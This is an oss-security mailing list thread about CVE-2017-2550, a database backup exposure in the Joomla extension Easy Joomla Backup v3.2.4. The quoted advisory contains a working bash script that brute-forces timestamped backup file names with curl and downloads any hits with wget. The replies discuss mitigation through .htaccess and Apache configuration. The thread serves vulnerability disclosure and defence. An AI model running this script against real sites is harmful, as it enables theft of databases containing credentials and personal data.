oss-security - Re: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [<thread-prev] [day] [month] [year] [list]

Date: Thu, 28 Sep 2017 12:05:40 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: oss-security@...ts.openwall.com
Subject: Re: Joomla extension Easy Joomla Backup v3.2.4 database
 backup exposure

Hi David,

This is correct, hardened shared hosting platforms won't be vulnerable to this attack.

I've now updated the configuration on my lab Ubuntu system by changing apache2.conf:

# diff -Nur orig apache2.conf 
--- orig	2017-09-28 12:02:13.674668975 -0400
+++ apache2.conf	2017-09-28 11:47:50.898322778 -0400
@@ -163,7 +163,7 @@
 
 <Directory /var/www/>
 	Options Indexes FollowSymLinks
-	AllowOverride None
+	AllowOverride All
 	Require all granted
 </Directory>

Thanks,
Larry

> On Sep 28, 2017, at 9:09 AM, David Jardin <david.jardin@...munity.joomla.org> wrote:
> 
> It’s worth to mention that the extension has a default .htaccess file with a „deny from all“ in the backup directory, that will mitigate the described attack on pretty much any standard shared-hosting platform that I’m aware of.
> 
> 
> 
> 
> Am 28. September 2017 um 14:37:20, Larry W. Cashdollar (larry0@...com) schrieb:
> 
>> Title: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure 
>> Author: Larry W. Cashdollar, @_larry0 
>> Date: 2017-09-07 
>> CVE-ID:[CVE-2017-2550] 
>> Download Site: https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup 
>> Vendor: kubik-rubik 
>> Vendor Notified: 2017-09-07 
>> Vendor Contact: 
>> Advisory: http://www.vapidlabs.com/advisory.php?v=200 
>> Description: Easy Joomla Backup creates 'old-school' backups without any frills. 
>> Vulnerability: 
>> The software creates a copy of the backup in the web root. The file name is easily guessable as it's just a time stamp: 
>> 
>> http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip 
>> 
>> Exploit Code: 
>> • #!/bin/bash 
>> • #Larry W. Cashdollar, @_larry0 9/7/2017 
>> • #Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4 
>> • #https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup 
>> • MONTH=09 
>> • DAY=07 
>> • YEAR=2017 
>> • Z=0 
>> • #May need to set the DOMAIN to $1 the target depending on how WP is configured. 
>> • DOMAIN=192.168.0.163 
>> •  
>> • echo "Scanning website for available backups:" 
>> • for y in `seq -w 0 23`; do 
>> • for x in `seq -w 0 59`; do 
>> • Y=`echo "scale=2;($Z/86000)*100"|bc`; 
>> • echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%" 
>> • for z in `seq -w 0 59`; do 
>> • Z=$(( $Z + 1 )); 
>> • CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip"; 
>> • RESULT=`curl -s --head $CPATH|grep 200`; 
>> • if [ -n "$RESULT" ]; then 
>> • echo "" 
>> • echo "[+] Location $CPATH Found"; 
>> • echo "[+] Received $RESULT"; 
>> • echo "Downloading......"; 
>> • wget $CPATH 
>> • fi; 
>> • done 
>> • done 
>> • done 
>> • echo "Completed."
> -- 
> Kind Regards,
> David Jardin

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.